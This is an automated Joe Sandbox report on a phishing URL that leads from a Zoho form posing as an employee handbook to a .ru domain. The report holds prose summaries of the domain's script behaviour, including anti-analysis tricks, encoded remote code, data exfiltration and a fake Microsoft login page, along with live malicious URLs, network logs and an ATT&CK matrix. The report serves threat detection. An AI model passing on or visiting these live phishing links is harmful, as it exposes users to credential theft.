Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://zfrmz.com/hu0ngo1Ul357L1ChjHxW

Overview

General Information

Sample URL:https://zfrmz.com/hu0ngo1Ul357L1ChjHxW
Analysis ID:1596216

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 2388 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 5792 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1892,i,14782951031728803655,4849873704660599494,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • chrome.exe (PID: 6584 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://zfrmz.com/hu0ngo1Ul357L1ChjHxW" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: https://forms.zohopublic.com/philhdr1/form/2025EmployeesHandbook/formperma/GrVUygSKNf4o4V5HIfB_T9v6K96eG8oZnr1iSlS9nJMJoe Sandbox AI: Page contains button: 'ACCESS HANDBOOK' Source: '1.2.pages.csv'
Source: 0.12.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://dmk.erbirkinarinf.ru/ufPlTO2Y/... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common developer tools and keyboard shortcuts, and redirecting the user to a suspicious login page. These behaviors are highly indicative of malicious intent, such as preventing analysis, obstructing security researchers, and potentially phishing for user credentials.
Source: 0.13.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://dmk.erbirkinarinf.ru/ufPlTO2Y/... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and suspicious domain interactions. It uses the `turnstile.render()` function to render a form, but also sets up event handlers and makes multiple network requests to potentially malicious domains. The script appears to be collecting user data and redirecting users to a Microsoft login page, which is highly suspicious behavior indicative of a phishing or malware attempt.
Source: 0.10.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://dmk.erbirkinarinf.ru/ufPlTO2Y/... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `atob()` and `decodeURIComponent()` to execute remote code, along with the attempt to send user data to an untrusted domain, are clear indicators of malicious intent. Additionally, the script attempts to disable common browser security features like the context menu and certain keyboard shortcuts, further suggesting a malicious purpose. Overall, this script demonstrates a high level of risk and should be treated with caution.
Source: https://dmk.erbirkinarinf.ru/ufPlTO2Y/HTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.17:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49744 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.17:49771 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: global trafficDNS traffic detected: DNS query: zfrmz.com
Source: global trafficDNS traffic detected: DNS query: forms.zohopublic.com
Source: global trafficDNS traffic detected: DNS query: static.zohocdn.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: dmk.erbirkinarinf.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.17:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49744 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.17:49771 version: TLS 1.2
Source: classification engineClassification label: mal48.win@20/27@30/132
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1892,i,14782951031728803655,4849873704660599494,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://zfrmz.com/hu0ngo1Ul357L1ChjHxW"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1892,i,14782951031728803655,4849873704660599494,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://zfrmz.com/hu0ngo1Ul357L1ChjHxW0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
a.nel.cloudflare.com
35.190.80.1
truefalse
    high
    code.jquery.com
    151.101.66.137
    truefalse
      high
      cdnjs.cloudflare.com
      104.17.25.14
      truefalse
        high
        challenges.cloudflare.com
        104.18.94.41
        truefalse
          high
          h2-stratus.zohocdn.com
          89.36.170.147
          truefalse
            high
            www.google.com
            142.250.184.196
            truefalse
              high
              dmk.erbirkinarinf.ru
              104.21.48.182
              truetrue
                unknown
                zpublic.zohopublic.com
                136.143.182.97
                truefalse
                  high
                  zfrmz.com
                  136.143.183.178
                  truefalse
                    high
                    forms.zohopublic.com
                    unknown
                    unknownfalse
                      high
                      static.zohocdn.com
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://forms.zohopublic.com/philhdr1/form/2025EmployeesHandbook/formperma/GrVUygSKNf4o4V5HIfB_T9v6K96eG8oZnr1iSlS9nJMtrue
                          unknown
                          https://dmk.erbirkinarinf.ru/ufPlTO2Y/true
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            136.143.182.97
                            zpublic.zohopublic.comUnited States
                            2639ZOHO-ASUSfalse
                            142.250.184.196
                            www.google.comUnited States
                            15169GOOGLEUSfalse
                            104.17.24.14
                            unknownUnited States
                            13335CLOUDFLARENETUSfalse
                            1.1.1.1
                            unknownAustralia
                            13335CLOUDFLARENETUSfalse
                            142.250.186.163
                            unknownUnited States
                            15169GOOGLEUSfalse
                            104.18.94.41
                            challenges.cloudflare.comUnited States
                            13335CLOUDFLARENETUSfalse
                            89.36.170.147
                            h2-stratus.zohocdn.comSwitzerland
                            41913COMPUTERLINEComputerlineSchlierbachSwitzerlandCHfalse
                            151.101.130.137
                            unknownUnited States
                            54113FASTLYUSfalse
                            142.250.185.170
                            unknownUnited States
                            15169GOOGLEUSfalse
                            142.251.168.84
                            unknownUnited States
                            15169GOOGLEUSfalse
                            104.21.48.182
                            dmk.erbirkinarinf.ruUnited States
                            13335CLOUDFLARENETUStrue
                            239.255.255.250
                            unknownReserved
                            unknownunknownfalse
                            136.143.183.178
                            zfrmz.comUnited States
                            2639ZOHO-ASUSfalse
                            142.250.185.174
                            unknownUnited States
                            15169GOOGLEUSfalse
                            151.101.66.137
                            code.jquery.comUnited States
                            54113FASTLYUSfalse
                            35.190.80.1
                            a.nel.cloudflare.comUnited States
                            15169GOOGLEUSfalse
                            142.250.184.227
                            unknownUnited States
                            15169GOOGLEUSfalse
                            104.17.25.14
                            cdnjs.cloudflare.comUnited States
                            13335CLOUDFLARENETUSfalse
                            IP
                            192.168.2.17
                            192.168.2.4
                            Joe Sandbox version:42.0.0 Malachite
                            Analysis ID:1596216
                            Start date and time:2025-01-21 20:43:46 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:defaultwindowsinteractivecookbook.jbs
                            Sample URL:https://zfrmz.com/hu0ngo1Ul357L1ChjHxW
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:17
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • EGA enabled
                            Analysis Mode:stream
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal48.win@20/27@30/132
                            • Exclude process from analysis (whitelisted): TextInputHost.exe
                            • Excluded IPs from analysis (whitelisted): 142.250.186.163, 142.250.185.174, 142.251.168.84, 216.58.206.78, 216.58.212.142, 142.250.185.170, 216.58.212.170, 142.250.186.106, 216.58.206.42, 142.250.185.106, 172.217.16.138, 172.217.16.202, 142.250.184.234, 142.250.185.74, 142.250.181.234, 216.58.212.138, 142.250.185.138, 172.217.18.10, 142.250.186.170, 172.217.23.106, 172.217.18.106
                            • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, content-autofill.googleapis.com, clientservices.googleapis.com, clients.l.google.com
                            • Not all processes where analyzed, report is missing behavior information
                            • VT rate limit hit for: https://zfrmz.com/hu0ngo1Ul357L1ChjHxW
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 21 18:44:17 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                            Category:dropped
                            Size (bytes):2677
                            Entropy (8bit):3.9963397527643325
                            Encrypted:false
                            SSDEEP:
                            MD5:E634AEFC40E8298FE31CA9530DC743F5
                            SHA1:3EA99C45B06706FC4EDF9F0DAE666E0BD222892C
                            SHA-256:B053D22104393075D57CD0D6032DD7B66782D26AC838A22F6E657D0ECB15A04B
                            SHA-512:FAE68DAD318A6B2A90D0CE0D95E14A42AA06E900992421AC73E3D56F543A0486E92F2F9121F41ED0C25B14CD84FD23E79790AEE657CE4B29AAD0455417D7948C
                            Malicious:false
                            Reputation:unknown
                            Preview:L..................F.@.. ...$+.,......r.<l......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I5Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V5Z......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V5Z......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V5Z.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V5Z.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............=.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 21 18:44:17 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                            Category:dropped
                            Size (bytes):2679
                            Entropy (8bit):4.0126456477288155
                            Encrypted:false
                            SSDEEP:
                            MD5:C14B3A764C6C43A6AD83B2806513A841
                            SHA1:B6B9659A64CB9B52DCC86D011A0B889FC38B5B62
                            SHA-256:24F7BF3BA91F7EDD92AEC73D5DAF385050165D983BB32CF00723CF2A48A53295
                            SHA-512:C416465A9A5AD338FD4FD368F5A9CD92F4565FB5C18946364D9DB9108E4F1173C3211E5E3C3FAAFA5A30B7D1167F13A7AB1924C6C33E5E1780D6D27503AD30F5
                            Malicious:false
                            Reputation:unknown
